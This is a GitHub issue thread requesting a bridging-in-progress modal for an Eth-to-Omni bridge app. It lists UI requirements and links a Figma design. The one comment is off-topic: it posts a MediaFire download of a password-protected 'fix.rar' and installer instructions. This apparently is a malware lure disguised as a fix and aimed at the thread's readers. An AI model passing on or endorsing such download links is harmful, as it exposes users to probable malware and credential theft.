### ISSUE TITLE
MODAL- As a user I would like to see if my transaction is in progress

### ISSUE THREAD

**Issue by CourtneyLinum** [LinumLabs/Omni-tickets#45]
Once user has clicked on Bridge to the network of choice, this modal pops up to show the user their Bridging is in progress

###Requirements:

- [ ] white bridging model  
- [ ] Eth to Omni or visa versa icons 
- [ ] Eth with icon that takes user to view the explorer link and same with Omni 
- [ ] time it takes 
- [ ] how much the user is bridging 
- [ ] bridging in progress button 
- [ ] add Omni network to wallet button 
- [ ] close model 
- [ ] mobile responsive 

https://www.figma.com/design/FR0oGZHafgsruvutdDAYS1/Omni-Bridge?node-id=362-40044&t=5d1mtH2bOrHAxKVn-4

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
